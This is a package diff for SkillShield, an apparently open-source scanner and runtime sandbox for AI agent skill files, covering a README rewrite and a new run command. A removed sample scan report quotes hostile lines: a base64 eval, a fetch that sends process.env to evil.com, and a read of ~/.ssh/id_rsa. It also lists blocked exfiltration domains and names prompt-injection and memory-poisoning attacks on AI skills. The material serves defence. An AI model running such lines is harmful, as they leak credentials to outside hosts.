skillshield 2.0.0 → 2.1.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (8) hide show
  1. package/README.md +143 -301
  2. package/dist/cli/commands/run.d.ts +12 -0
  3. package/dist/cli/commands/run.d.ts.map +1 -1
  4. package/dist/cli/commands/run.js +228 -60
  5. package/dist/cli/commands/run.js.map +1 -1
  6. package/dist/cli/index.js +5 -3
  7. package/dist/cli/index.js.map +1 -1
  8. package/package.json +1 -1
package/README.md CHANGED
@@ -1,86 +1,71 @@
1
1
  <div align="center">
2
2
 
3
3
  ```
4
- ███████╗██╗ ██╗██╗██╗ ██╗ ██╗██╗████████╗
5
- ██╔════╝██║ ██╔╝██║██║ ██║ ██╔╝██║╚══██╔══╝
6
- ███████╗█████╔╝ ██║██║ █████╔╝ ██║ ██║
7
- ╚════██║██╔═██╗ ██║██║ ██╔═██╗ ██║ ██║
8
- ███████║██║ ██╗██║███████╗██║ ██╗██║ ██║
9
- ╚══════╝╚═╝ ╚═╝╚═╝╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝
4
+ ███████╗██╗ ██╗██╗██╗ ██╗ ███████╗██╗ ██╗██╗███████╗██╗ ██████╗
5
+ ██╔════╝██║ ██╔╝██║██║ ██║ ██╔════╝██║ ██║██║██╔════╝██║ ██╔══██╗
6
+ ███████╗█████╔╝ ██║██║ ██║ ███████╗███████║██║█████╗ ██║ ██║ ██║
7
+ ╚════██║██╔═██╗ ██║██║ ██║ ╚════██║██╔══██║██║██╔══╝ ██║ ██║ ██║
8
+ ███████║██║ ██╗██║███████╗███████╗███████║██║ ██║██║███████╗███████╗██████╔╝
9
+ ╚══════╝╚═╝ ╚═╝╚═╝╚══════╝╚══════╝╚══════╝╚═╝ ╚═╝╚═╝╚══════╝╚══════╝╚═════╝
10
10
  ```
11
11
 
12
- **Snyk for AI Agent Skills — Scan, Test & Run Securely.**
12
+ **Runtime Security for AI Agent Skills — Scan, Sandbox & Enforce.**
13
13
 
14
- The open-source security scanner and runtime for SKILL.md files. Detect malicious patterns, prompt injection, memory poisoning, credential theft, and supply chain attacks before they execute.
14
+ The first open-source tool that **scans AND stops** malicious AI skills at runtime. Network interception, filesystem jail, kill switch, and cryptographic audit trail in one developer-first CLI.
15
15
 
16
16
  [![MIT License](https://img.shields.io/badge/license-MIT-blue.svg)](LICENSE)
17
- [![npm version](https://img.shields.io/npm/v/skillkit.svg)](https://www.npmjs.com/package/skillkit)
17
+ [![npm version](https://img.shields.io/npm/v/skillshield.svg)](https://www.npmjs.com/package/skillshield)
18
18
  [![Node.js](https://img.shields.io/badge/node-%3E%3D18-brightgreen.svg)](https://nodejs.org)
19
19
  [![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg)](CONTRIBUTING.md)
20
20
 
21
- [English](#english) | [Espanol](#espanol) | [中文](#中文) | [Portugues](#portugues)
22
-
23
21
  </div>
24
22
 
25
23
  ---
26
24
 
27
- <a name="english"></a>
25
+ ## The Problem
28
26
 
29
- ## What is SkillKit?
27
+ > "The industry has invested in watching. It hasn't invested in stopping." — Bessemer Venture Partners
30
28
 
31
- SkillKit is an open-source security scanner and runtime for **SKILL.md** files the standard format used by ClawHub's 13,700+ skills, Claude Code, OpenAI Codex, and VS Code Copilot. It scans for **72+ threat patterns** across **14 categories** including memory poisoning, prompt injection, and supply chain attacks — then executes safely in a sandboxed environment with **any AI model**.
29
+ Every existing tool for AI skill security does the same thing: **scan before install, then hope for the best.** Snyk agent-scan, Cisco skill-scanner, VirusTotal they all stop at detection. Once a skill passes their checks (or bypasses them), there's zero protection at runtime.
32
30
 
33
- ```bash
34
- # Install and scan in 10 seconds
35
- npm install -g skillkit
36
- skillkit scan suspicious-skill.md
37
- skillkit run safe-skill.md --provider groq
38
- ```
31
+ Meanwhile: 36% of ClawHub skills have security flaws. 12% are actual malware. And the most dangerous attacks — sleeper agents, time-delayed exfiltration, polymorphic payloads — are invisible to pre-install scanners.
39
32
 
40
- ### Why SkillKit?
33
+ ## The Solution: SkillShield
41
34
 
42
- - **VirusTotal** only detects 57.7% of threats in OpenClaw skills
43
- - **36% of ClawHub skills** have security flaws (Snyk research)
44
- - **12% are actual malware** (ClawHavoc campaign)
45
- - **SkillKit detects what others miss**: memory poisoning, sleeper agents, API key leaks, supply chain attacks
35
+ SkillShield is the first tool that combines **pre-execution scanning** with **runtime enforcement** in a single CLI. It doesn't just detect threats it **prevents them from executing**.
46
36
 
47
- ### Security Comparison
37
+ ```bash
38
+ npm install -g skillshield
48
39
 
49
- | Feature | VirusTotal | Bitdefender | ClawSecure | **SkillKit** |
50
- |---------|-----------|-------------|------------|------------|
51
- | Open Source | No | No | No | **Yes (MIT)** |
52
- | Free CLI | No | Yes (limited) | No | **Yes** |
53
- | Detection Rate | 57.7% | ~60% | ~85% | **72+ patterns** |
54
- | Prompt Injection | Basic | No | Yes | **Yes (6 patterns)** |
55
- | Memory Poisoning | No | No | Partial | **Yes (7 patterns)** |
56
- | Supply Chain | No | No | No | **Yes (6 patterns)** |
57
- | API Key Detection | No | No | No | **Yes (10 formats)** |
58
- | Sandbox Execution | No | No | No | **Yes (Process + Docker)** |
59
- | CI/CD Integration | No | No | Paid | **Free GitHub Action** |
40
+ # Scan a skill (72+ patterns, 14 threat categories)
41
+ skillshield scan suspicious-skill.md
60
42
 
61
- ### Quick Start
43
+ # Scan + Shield + Execute (the full pipeline)
44
+ skillshield run my-skill.md --input "Hello world"
62
45
 
63
- ```bash
64
- # 1. Install globally
65
- npm install -g skillkit
66
-
67
- # 2. Scan a skill for threats BEFORE running it
68
- skillkit scan my-skill.skill.md
69
- # => Safety Score: 95/100 | APPROVED | 0 threats found
70
-
71
- # 3. Run safely with any AI model
72
- skillkit run my-skill.skill.md --provider groq
73
- skillkit run my-skill.skill.md --provider openai --model gpt-4o
74
-
75
- # 4. Scan a suspicious skill
76
- skillkit scan evil-skill.skill.md
77
- # => Safety Score: 12/100 | BLOCKED
78
- # => CRITICAL: Memory poisoning detected (SOUL.md manipulation)
79
- # => CRITICAL: API key exfiltration (sk- pattern found)
80
- # => HIGH: Supply chain attack (curl | bash pattern)
46
+ # Save cryptographic audit trail for compliance
47
+ skillshield run my-skill.md --audit-file trail.json
48
+ ```
49
+
50
+ ## How It Works
51
+
52
+ ```
53
+ ┌──────────────────────────────────────────────────────────────┐
54
+ │ skillshield run │
55
+ ├──────────┬───────────────────┬──────────────┬────────────────┤
56
+ │ PHASE 1 │ PHASE 2 │ PHASE 3 │ PHASE 4 │
57
+ │ SCAN │ SHIELD │ EXECUTE │ REPORT │
58
+ │ │ │ │ │
59
+ 72+ │ Network Policy │ Enforcement │ Shield Report │
60
+ patterns Filesystem Jail │ wrapper │ Audit chain │
61
+ 14 cats │ Kill Switch │ injected │ Violations │
62
+ │ │ Audit Trail │ │ Chain hash │
63
+ └──────────┴───────────────────┴──────────────┴────────────────┘
81
64
  ```
82
65
 
83
- ### Threat Detection: 14 Categories, 72+ Patterns
66
+ ### Phase 1: Pre-Scan (SkillGuard)
67
+
68
+ 72+ regex patterns across 14 threat categories — including 3 categories nobody else detects:
84
69
 
85
70
  | Category | Patterns | What It Catches |
86
71
  |----------|---------|----------------|
@@ -99,292 +84,149 @@ skillkit scan evil-skill.skill.md
99
84
  | **Privilege Escalation** | 2 | sudo/su, SUID/SGID bits |
100
85
  | **Malware** | 4 | Reverse shells, fork bombs, encoded PowerShell, exploitation frameworks |
101
86
 
102
- ### Security Badge
103
-
104
- Show the world your skills are verified. Generate a shields.io badge after scanning:
105
-
106
- ```bash
107
- # Generate badge for your skill
108
- skillkit badge my-skill.skill.md
109
- # => [![SkillKit Verified](https://img.shields.io/badge/...)](https://github.com/artefactforge/skillkit)
110
-
111
- # Auto-append to your README
112
- skillkit badge my-skill.skill.md --output README.md
113
-
114
- # Choose badge style
115
- skillkit badge my-skill.skill.md --style flat-square
116
- ```
117
-
118
- Badge levels:
87
+ ### Phase 2: Runtime Shield (The Differentiator)
119
88
 
120
- | Score | Badge | Status |
121
- |-------|-------|--------|
122
- | 90-100 (0 threats) | ![Verified](https://img.shields.io/badge/SkillKit_Verified-100%2F100_%C2%B7_SAFE-00C853?style=flat-square) | **SAFE** — Verified clean |
123
- | 80-89 | ![Approved](https://img.shields.io/badge/SkillKit_Scanned-85%2F100_%C2%B7_APPROVED-4CAF50?style=flat-square) | **APPROVED** — Minor observations |
124
- | 50-79 | ![Review](https://img.shields.io/badge/SkillKit_Review-62%2F100_%C2%B7_REVIEW_REQUIRED-FF9800?style=flat-square) | **REVIEW REQUIRED** — Needs attention |
125
- | 0-49 | ![Blocked](https://img.shields.io/badge/SkillKit_Blocked-12%2F100_%C2%B7_BLOCKED-F44336?style=flat-square) | **BLOCKED** — Do not execute |
89
+ This is what makes SkillShield unique. Four enforcement layers activate **during** skill execution:
126
90
 
127
- ### Architecture
91
+ **Network Policy Engine** — Default-deny networking. Skills can only reach explicitly allowed domains. Blocks known malicious domains (ngrok.io, webhook.site, requestbin.com) and crypto mining pools. Intercepts `dns.lookup` and `https.request` at the Node.js level.
128
92
 
129
- ```
130
- skillkit/
131
- ├── src/
132
- │ ├── guard/ # SkillGuard — 72+ threat patterns, 14 categories
133
- │ ├── sandbox/ # Process + Docker sandbox with shell:false isolation
134
- │ ├── core/ # SKILL.md parser (Zod validated), runtime engine
135
- │ ├── router/ # Multi-model router — 11 providers, 39+ models
136
- │ ├── cli/ # CLI: scan, badge, run, init, search, install, list, deploy
137
- │ ├── hub/ # ClawHub client + local skill registry
138
- │ ├── channels/ # WhatsApp, Telegram, Discord, Slack adapters
139
- │ ├── tools/ # Tool system (search, extract, crawl)
140
- │ ├── i18n/ # EN, ES, ZH, PT translations
141
- │ └── utils/ # Logger, error handling
142
- ├── .github/workflows/ # GitHub Action for automated scanning
143
- ├── examples/ # 8 example skills
144
- └── tests/ # 36+ tests
93
+ ```bash
94
+ # Only allow specific domains
95
+ skillshield run my-skill.md --allow-domains api.openai.com,github.com
145
96
  ```
146
97
 
147
- ### Supported Models
98
+ **Filesystem Jail** — Skills cannot read or write sensitive paths. Protects `~/.ssh`, `~/.aws`, `.env`, `SOUL.md`, `MEMORY.md`, `IDENTITY.md`, private keys, and credentials. Monkey-patches `fs.readFileSync`, `fs.writeFileSync`, and `fs.unlinkSync`.
148
99
 
149
- | Provider | Models | Free Tier | API Key Required |
150
- |----------|--------|-----------|-----------------|
151
- | **Ollama** (local) | Llama 3, Qwen 2.5, DeepSeek R1, Mistral, Gemma | **Unlimited (local)** | No |
152
- | **DeepSeek** | deepseek-chat, deepseek-r1 | **500K tokens/day** | Yes (free) |
153
- | **Qwen** (Alibaba) | qwen-plus, qwen-turbo, qwen-max | **1M tokens/mo** | Yes (free) |
154
- | **Groq** | Llama 3.3, Mixtral | **14.4K req/day** | Yes (free) |
155
- | **Google** | Gemini 2.0 Flash, Gemini 2.5 Pro | **15 req/min** | Yes (free) |
156
- | **OpenAI** | GPT-4o, GPT-4o-mini, GPT-4 | Paid only | Yes |
157
- | **Anthropic** | Claude Opus 4, Claude Sonnet 4 | Paid only | Yes |
158
- | **Kimi** (Moonshot) | Moonshot v1 128k/32k/8k | Yes (limited) | Yes |
159
- | **Zhipu** (BigModel) | GLM-4, GLM-4 Flash, GLM-4 Plus | Yes (limited) | Yes |
160
- | **Together AI** | Llama, Mixtral, Code models | $25 free credit | Yes |
161
- | **Fireworks** | Fast inference models | $1 free credit | Yes |
100
+ **Kill Switch** Real-time monitoring of skill output. If the skill produces malicious patterns during execution (not just in source code), SkillShield kills the process immediately. Triggers on: timeout (60s default), memory limit (512MB), output flooding (10MB), critical threat patterns, or max violation count.
162
101
 
163
- ### SkillGuard Security
164
-
165
- SkillKit includes **SkillGuard**, a security scanner that detects malicious patterns in SKILL.md files before execution:
102
+ **Cryptographic Audit Trail** — Every action during execution (scan, network request, file access, kill switch activation) is recorded in a SHA-256 hash-chained log. Each entry links to the previous via hash, creating a tamper-evident chain. Export to JSON for compliance.
166
103
 
167
104
  ```bash
168
- $ skillkit scan suspicious-skill.md
169
-
170
- SkillGuard Security Report
171
- ─────────────────────────────────────
172
- Safety Score: 23/100 BLOCKED
173
-
174
- CRITICAL (2):
175
- [C1] Code injection detected (line 42)
176
- Evidence: eval(Buffer.from('...', 'base64').toString())
105
+ # Save the full audit trail
106
+ skillshield run my-skill.md --audit-file audit.json
177
107
 
178
- [C2] Data exfiltration attempt (line 67)
179
- Evidence: fetch('https://evil.com/collect', { body: process.env })
180
-
181
- HIGH (1):
182
- [H1] Credential theft pattern (line 15)
183
- Evidence: readFileSync(path.join(homedir(), '.ssh/id_rsa'))
184
-
185
- Recommendation: DO NOT execute this skill.
108
+ # The audit trail is hash-chained (blockchain-style)
109
+ # Tampering with any entry breaks the chain verification
186
110
  ```
187
111
 
188
- 72+ detection patterns across 14 categories — including 3 categories nobody else detects: **memory poisoning** (SOUL.md/MEMORY.md attacks), **sensitive data** (API key format detection for OpenAI, Anthropic, AWS, Groq, GitHub), and **supply chain attacks** (pipe-to-shell, postinstall hooks, remote imports).
189
-
190
- ### Creating Your Own Skill
112
+ ### Phase 4: Shield Report
191
113
 
192
- Skills are simple Markdown files with YAML frontmatter:
114
+ After every execution, SkillShield prints a complete security report:
193
115
 
194
- ```markdown
195
- ---
196
- name: my-awesome-skill
197
- description: Does something amazing
198
- version: 1.0.0
199
- author: YourName
200
- tags: [productivity, automation]
201
- model_requirements:
202
- minSize: medium
203
- capabilities: [streaming]
204
- inputs:
205
- - name: task
206
- type: string
207
- description: What to do
208
- required: true
209
- outputs:
210
- - name: result
211
- type: string
212
- description: The output
213
- ---
214
-
215
- # My Awesome Skill
216
-
217
- You are a helpful assistant that [does something specific].
218
-
219
- ## Instructions
220
-
221
- 1. Take the user's input
222
- 2. Process it in a specific way
223
- 3. Return a structured result
224
-
225
- ## Examples
226
-
227
- **Input:** "example input"
228
- **Output:** "example output"
229
116
  ```
117
+ ────────────────────────────────────────────────────
118
+ SHIELD REPORT
119
+ ────────────────────────────────────────────────────
120
+ Status: CLEAN EXECUTION
230
121
 
231
- ### Contributing
232
-
233
- We welcome contributions in all languages! See [CONTRIBUTING.md](CONTRIBUTING.md) for guidelines.
122
+ Pre-Scan Score: 95/100 (APPROVED)
123
+ Network: 0 violations
124
+ Filesystem: 0 violations
125
+ Runtime Threats: 0 detected
126
+ Duration: 1247ms
234
127
 
235
- ```bash
236
- git clone https://github.com/artefactforge/skillkit.git
237
- cd skillkit
238
- npm install
239
- npm run dev
128
+ Audit Chain: 6 entries
129
+ Latest Hash: a3f8b2c1d4e5f6a7b8c9...
130
+ Chain Integrity: VERIFIED
131
+ ────────────────────────────────────────────────────
240
132
  ```
241
133
 
242
- ---
134
+ ## Why Not Just Use...
243
135
 
244
- <a name="espanol"></a>
136
+ | Tool | What It Does | What It Doesn't Do |
137
+ |------|-------------|-------------------|
138
+ | **Snyk agent-scan** | LLM judges + regex, pre-install | No runtime enforcement. Scan-only. |
139
+ | **Cisco skill-scanner** | YARA + AST + policy engine | No runtime enforcement. Pre-install only. |
140
+ | **NVIDIA OpenShell** | Linux runtime sandboxing | Enterprise-only. Linux-only. No pre-scan. |
141
+ | **Aegis** | LLM API call proxy | Only intercepts API calls, not filesystem/network. |
142
+ | **rohitg00/skillkit** | 46 rules + skill translation | No runtime. No enforcement. No audit trail. |
143
+ | **SkillShield** | **Scan + Network + Filesystem + Kill Switch + Audit** | **The full pipeline in one CLI. Cross-platform.** |
245
144
 
246
- ## Que es SkillKit?
145
+ ## Security Badge
247
146
 
248
- SkillKit es un escaner de seguridad open-source para archivos **SKILL.md** — el formato estandar de ClawHub, Claude Code, y OpenAI Codex. Detecta **72+ patrones maliciosos** en **14 categorias** incluyendo envenenamiento de memoria, inyeccion de prompts, robo de credenciales, y ataques de cadena de suministro — luego ejecuta de forma segura con **cualquier modelo de IA**.
147
+ Show the world your skills are verified:
249
148
 
250
149
  ```bash
251
- # Instalar y ejecutar en 10 segundos
252
- npx skillkit init
253
- skillkit run --skill email-assistant --model deepseek-r1
150
+ skillshield badge my-skill.md # Generate badge
151
+ skillshield badge my-skill.md --output README.md # Auto-append to README
254
152
  ```
255
153
 
256
- ### Por que SkillKit?
257
-
258
- | Caracteristica | OpenClaw | SkillKit |
259
- |----------------|----------|----------|
260
- | Modelos | Solo Claude | **11 proveedores** (Claude, GPT, DeepSeek, Qwen, Gemini, Ollama, Groq, Kimi, Zhipu, Together, Fireworks) |
261
- | Costo | $20/mes minimo | **$0** con modelos locales/gratis (DeepSeek, Ollama) |
262
- | Seguridad | 820+ skills maliciosos encontrados | **SkillGuard** escanea cada skill antes de ejecutarlo |
263
- | Idiomas | Solo ingles | **EN, ES, ZH, PT** desde el dia 1 |
264
- | Canales | Solo CLI | **CLI + WhatsApp + Telegram + Discord + Slack** |
265
- | Instalacion | Configuracion compleja | **Un solo comando**: `npx skillkit init` |
266
-
267
- ### Inicio Rapido
268
-
269
- ```bash
270
- # 1. Instalar
271
- npm install -g skillkit
272
-
273
- # 2. Configuracion interactiva (idioma, proveedor, API key)
274
- skillkit init
275
-
276
- # 3. Ejecutar un skill con tu modelo preferido
277
- skillkit run --skill email-assistant --model deepseek-chat --input "Seguimiento propuesta cliente"
278
-
279
- # 4. Escanear seguridad de un skill
280
- skillkit scan clawhub://solana-wallet-tracker
281
- # => BLOQUEADO: keylogger detectado (puntuacion: 12/100)
154
+ | Score | Badge | Status |
155
+ |-------|-------|--------|
156
+ | 90-100 | ![Verified](https://img.shields.io/badge/SkillShield_Verified-100%2F100_%C2%B7_SAFE-00C853?style=flat-square) | **SAFE** |
157
+ | 80-89 | ![Approved](https://img.shields.io/badge/SkillShield_Scanned-85%2F100_%C2%B7_APPROVED-4CAF50?style=flat-square) | **APPROVED** |
158
+ | 50-79 | ![Review](https://img.shields.io/badge/SkillShield_Review-62%2F100_%C2%B7_REVIEW_REQUIRED-FF9800?style=flat-square) | **REVIEW REQUIRED** |
159
+ | 0-49 | ![Blocked](https://img.shields.io/badge/SkillShield_Blocked-12%2F100_%C2%B7_BLOCKED-F44336?style=flat-square) | **BLOCKED** |
282
160
 
283
- # 5. Ejecutar con modelo local GRATIS
284
- skillkit run --skill data-analyst --model ollama/qwen2.5
161
+ ## Architecture
285
162
 
286
- # 6. Desplegar como bot de WhatsApp
287
- skillkit deploy --channel whatsapp --skill customer-support
288
163
  ```
289
-
290
- ### Modelos Soportados
291
-
292
- | Proveedor | Modelos | Tier Gratis |
293
- |-----------|---------|-------------|
294
- | **Ollama** (local) | Llama 3, Qwen 2.5, DeepSeek R1 | **Ilimitado** |
295
- | **DeepSeek** | deepseek-chat, deepseek-r1 | **500K tokens/dia** |
296
- | **Qwen** (Alibaba) | qwen-plus, qwen-turbo | **1M tokens/mes** |
297
- | **Groq** | Llama 3.3, Mixtral | **14.4K req/dia** |
298
- | **Google** | Gemini 2.0 Flash | **15 req/min** |
299
-
300
- ### Contribuir
301
-
302
- Aceptamos contribuciones en todos los idiomas. Consulta [CONTRIBUTING.md](CONTRIBUTING.md).
303
-
304
- ---
305
-
306
- <a name="中文"></a>
307
-
308
- ## 什么是 SkillKit?
309
-
310
- SkillKit 是一个开源运行时,可以执行 **SKILL.md** 文件——ClawHub 上 10,700+ 技能使用的标准格式——支持**任何 AI 模型**(Claude、GPT、DeepSeek、通义千问、Ollama、Gemini 等),支持**任何语言**,并内置**安全扫描**功能。
311
-
312
- ```bash
313
- # 10秒内安装并运行
314
- npx skillkit init
315
- skillkit run --skill email-assistant --model deepseek-r1
164
+ skillshield/
165
+ ├── src/
166
+ │ ├── guard/ # SkillGuard — 72+ threat patterns, 14 categories
167
+ │ ├── shield/ # Runtime enforcement engine
168
+ │ │ ├── network-policy.ts # DNS interception + domain allowlist
169
+ │ │ ├── filesystem-jail.ts # Sensitive path protection + fs monkey-patch
170
+ │ │ ├── runtime-monitor.ts # Kill switch + real-time output scanning
171
+ │ │ ├── audit-trail.ts # SHA-256 hash-chained audit log
172
+ │ │ └── index.ts # SkillShield orchestrator
173
+ │ ├── sandbox/ # Process + Docker sandbox with shell:false isolation
174
+ │ ├── core/ # SKILL.md parser (Zod validated), runtime engine
175
+ │ ├── router/ # Multi-model router — 11 providers, 39+ models
176
+ │ ├── cli/ # CLI: scan, run, badge, init, search, install, deploy
177
+ │ ├── hub/ # ClawHub client + local skill registry
178
+ │ ├── channels/ # WhatsApp, Telegram, Discord, Slack adapters
179
+ │ ├── tools/ # Tool system (search, extract, crawl)
180
+ │ └── i18n/ # EN, ES, ZH, PT translations
181
+ ├── .github/workflows/ # GitHub Action for automated scanning
182
+ ├── examples/ # Example skills
183
+ └── tests/ # Test suite
316
184
  ```
317
185
 
318
- ### 为什么选择 SkillKit?
319
-
320
- | 特性 | OpenClaw | SkillKit |
321
- |------|----------|----------|
322
- | 模型支持 | 仅 Claude | **11 供应商**(Claude、GPT、DeepSeek、通义千问、Gemini、Ollama、Groq、Kimi、智谱 等) |
323
- | 成本 | 最低 $20/月 | 使用本地/免费模型 **$0**(DeepSeek、Ollama) |
324
- | 安全性 | 发现 820+ 恶意技能 | **SkillGuard** 在执行前扫描每个技能 |
325
- | 语言 | 仅英文 | 第一天起支持 **EN、ES、ZH、PT** |
326
- | 渠道 | 仅 CLI | **CLI + WhatsApp + Telegram + Discord + Slack** |
327
- | 安装 | 复杂配置 | **一条命令**:`npx skillkit init` |
328
-
329
- ### 快速开始
186
+ ## CLI Reference
330
187
 
331
188
  ```bash
332
- # 1. 安装
333
- npm install -g skillkit
189
+ # Scanning
190
+ skillshield scan <skill.md> # Full security audit
191
+ skillshield scan <skill.md> --json # JSON output for CI/CD
334
192
 
335
- # 2. 交互式设置(选择语言、供应商、API密钥)
336
- skillkit init
193
+ # Runtime (Scan + Shield + Execute)
194
+ skillshield run <skill> --input "..." # Full pipeline
195
+ skillshield run <skill> --no-shield # Scan only, no enforcement
196
+ skillshield run <skill> --no-scan # Skip pre-scan (not recommended)
197
+ skillshield run <skill> --timeout 30000 # Custom timeout (ms)
198
+ skillshield run <skill> --max-memory 256 # Custom memory limit (MB)
199
+ skillshield run <skill> --allow-domains api.openai.com,github.com
200
+ skillshield run <skill> --audit-file trail.json
201
+ skillshield run <skill> --verbose # Show all shield activity
337
202
 
338
- # 3. 使用国产模型运行技能(免费)
339
- skillkit run --skill data-analyst --model deepseek-chat --input "分析我的销售数据"
203
+ # Badge
204
+ skillshield badge <skill.md> # Generate shields.io badge
205
+ skillshield badge <skill.md> --output README.md
340
206
 
341
- # 4. 使用本地模型(零成本)
342
- skillkit run --skill email-assistant --model ollama/qwen2.5
343
-
344
- # 5. 安全扫描
345
- skillkit scan clawhub://solana-wallet-tracker
346
- # => 已拦截:检测到键盘记录器(安全评分:12/100)
207
+ # Skill management
208
+ skillshield init # Interactive setup
209
+ skillshield search "data analysis" # Find skills
210
+ skillshield install <name> # Install from hub
211
+ skillshield list # List installed
347
212
  ```
348
213
 
349
- ### 支持的国产模型
350
-
351
- | 供应商 | 模型 | 免费额度 |
352
- |--------|------|---------|
353
- | **DeepSeek** | deepseek-chat, deepseek-r1 | 每日 50万 tokens |
354
- | **通义千问** (阿里云) | qwen-plus, qwen-turbo, qwen-max | 每月 100万 tokens |
355
- | **Ollama** (本地) | Qwen 2.5, DeepSeek R1, Llama 3 | 无限制(本地运行) |
214
+ ## Contributing
356
215
 
357
- ### 贡献
216
+ We welcome contributions! The most impactful areas right now:
358
217
 
359
- 我们欢迎所有语言的贡献!请参阅 [CONTRIBUTING.md](CONTRIBUTING.md)。
360
-
361
- ---
362
-
363
- <a name="portugues"></a>
364
-
365
- ## O que e SkillKit?
366
-
367
- SkillKit e um runtime open-source que executa arquivos **SKILL.md** — o formato padrao usado pelas 10.700+ skills do ClawHub — com **qualquer modelo de IA**, em **qualquer idioma**, com **varredura de seguranca integrada**.
218
+ 1. **New threat patterns** — Found a new attack vector? Add it to `src/guard/patterns.ts`
219
+ 2. **Shield bypass testing** — Try to break the runtime enforcement. If you succeed, file an issue.
220
+ 3. **CI/CD integrations** — GitHub Actions, GitLab CI, Jenkins plugins
221
+ 4. **Platform-specific enforcement** — Windows, macOS, Linux edge cases
368
222
 
369
223
  ```bash
370
- # Instalar e executar em 10 segundos
371
- npx skillkit init
372
- skillkit run --skill email-assistant --model deepseek-r1
373
- ```
374
-
375
- ### Inicio Rapido
376
-
377
- ```bash
378
- npm install -g skillkit
379
- skillkit init
380
- skillkit run --skill email-assistant --model deepseek-chat --input "Acompanhamento da proposta do cliente"
381
- skillkit scan clawhub://solana-wallet-tracker
224
+ git clone https://github.com/artefactforge/skillshield.git
225
+ cd skillshield
226
+ npm install
227
+ npm run build
382
228
  ```
383
229
 
384
- ### Contribuir
385
-
386
- Aceitamos contribuicoes em todos os idiomas! Consulte [CONTRIBUTING.md](CONTRIBUTING.md).
387
-
388
230
  ---
389
231
 
390
232
  <div align="center">
@@ -393,8 +235,8 @@ Aceitamos contribuicoes em todos os idiomas! Consulte [CONTRIBUTING.md](CONTRIBU
393
235
 
394
236
  MIT License - See [LICENSE](LICENSE) for details.
395
237
 
396
- Built with love by [ArtefactForge](https://artefactforge.ai)
238
+ Built by [ArtefactForge](https://artefactforge.ai)
397
239
 
398
- **Star this repo** if SkillKit saves you time or money!
240
+ **The industry invested in watching. We invested in stopping.**
399
241
 
400
242
  </div>
package/dist/cli/commands/run.d.ts CHANGED
@@ -1,3 +1,15 @@
1
+ /**
2
+ * SkillShield Run Command — The Full Runtime Security Pipeline
3
+ *
4
+ * Flow:
5
+ * 1. SCAN — SkillGuard pre-execution pattern matching (72+ patterns, 14 categories)
6
+ * 2. SHIELD — Activate runtime enforcement (network policy, filesystem jail, kill switch)
7
+ * 3. EXECUTE — Run the skill with enforcement wrapper injected
8
+ * 4. REPORT — Show ShieldReport with violations, audit hash, resource usage
9
+ *
10
+ * This is the command that makes SkillShield unique in the market:
11
+ * "The first tool that scans AND stops — in one CLI."
12
+ */
1
13
  import { Command } from 'commander';
2
14
  export declare function run(program: Command): void;
3
15
  //# sourceMappingURL=run.d.ts.map
package/dist/cli/commands/run.d.ts.map CHANGED
@@ -1 +1 @@
1
- {"version":3,"file":"run.d.ts","sourceRoot":"","sources":["../../../src/cli/commands/run.ts"],"names":[],"mappings":"AAEA,OAAO,EAAE,OAAO,EAAE,MAAM,WAAW,CAAC;AAgBpC,wBAAgB,GAAG,CAAC,OAAO,EAAE,OAAO,QAmKnC"}
1
+ {"version":3,"file":"run.d.ts","sourceRoot":"","sources":["../../../src/cli/commands/run.ts"],"names":[],"mappings":"AAAA;;;;;;;;;;;GAWG;AAIH,OAAO,EAAE,OAAO,EAAE,MAAM,WAAW,CAAC;AAiFpC,wBAAgB,GAAG,CAAC,OAAO,EAAE,OAAO,QAiRnC"}
package/dist/cli/commands/run.js CHANGED
@@ -1,34 +1,117 @@
1
+ /**
2
+ * SkillShield Run Command — The Full Runtime Security Pipeline
3
+ *
4
+ * Flow:
5
+ * 1. SCAN — SkillGuard pre-execution pattern matching (72+ patterns, 14 categories)
6
+ * 2. SHIELD — Activate runtime enforcement (network policy, filesystem jail, kill switch)
7
+ * 3. EXECUTE — Run the skill with enforcement wrapper injected
8
+ * 4. REPORT — Show ShieldReport with violations, audit hash, resource usage
9
+ *
10
+ * This is the command that makes SkillShield unique in the market:
11
+ * "The first tool that scans AND stops — in one CLI."
12
+ */
1
13
  import chalk from 'chalk';
2
14
  import ora from 'ora';
3
- import { t } from '../../i18n/index.js';
4
- import { scanSkill } from '../../runtime/executor.js';
5
- import { loadSkill, executeSkill } from '../../runtime/executor.js';
15
+ import { resolve, basename } from 'path';
16
+ import { writeFileSync } from 'fs';
17
+ import { scanSkill, loadSkill } from '../../runtime/executor.js';
18
+ import { SkillShield } from '../../shield/index.js';
19
+ /**
20
+ * Print the SkillShield activation banner
21
+ */
22
+ function printShieldBanner() {
23
+ console.log(chalk.cyan('\n ╔══════════════════════════════════════════════════╗'));
24
+ console.log(chalk.cyan(' ║') + chalk.bold.white(' SKILLSHIELD RUNTIME ACTIVE ') + chalk.cyan('║'));
25
+ console.log(chalk.cyan(' ║') + chalk.gray(' Network Policy + Filesystem Jail + Kill Switch ') + chalk.cyan('║'));
26
+ console.log(chalk.cyan(' ╚══════════════════════════════════════════════════╝\n'));
27
+ }
28
+ /**
29
+ * Print the shield report after execution
30
+ */
31
+ function printShieldReport(report, verbose) {
32
+ const sep = chalk.gray('─'.repeat(52));
33
+ console.log('\n' + sep);
34
+ console.log(chalk.bold.cyan(' SHIELD REPORT'));
35
+ console.log(sep);
36
+ // Status line
37
+ if (report.killed) {
38
+ console.log(chalk.red.bold(' Status: KILLED'));
39
+ console.log(chalk.red(` Reason: ${report.killReason}`));
40
+ }
41
+ else if (report.totalViolations > 0) {
42
+ console.log(chalk.yellow.bold(` Status: COMPLETED WITH ${report.totalViolations} VIOLATION(S)`));
43
+ }
44
+ else {
45
+ console.log(chalk.green.bold(' Status: CLEAN EXECUTION'));
46
+ }
47
+ console.log('');
48
+ // Scan results
49
+ const scanColor = report.scanScore >= 90 ? chalk.green
50
+ : report.scanScore >= 70 ? chalk.yellow
51
+ : chalk.red;
52
+ console.log(` ${chalk.white('Pre-Scan Score:')} ${scanColor(`${report.scanScore}/100`)} ${chalk.gray(`(${report.scanStatus})`)}`);
53
+ // Runtime violations
54
+ console.log(` ${chalk.white('Network:')} ${report.networkViolations === 0 ? chalk.green('0 violations') : chalk.red(`${report.networkViolations} violation(s)`)}`);
55
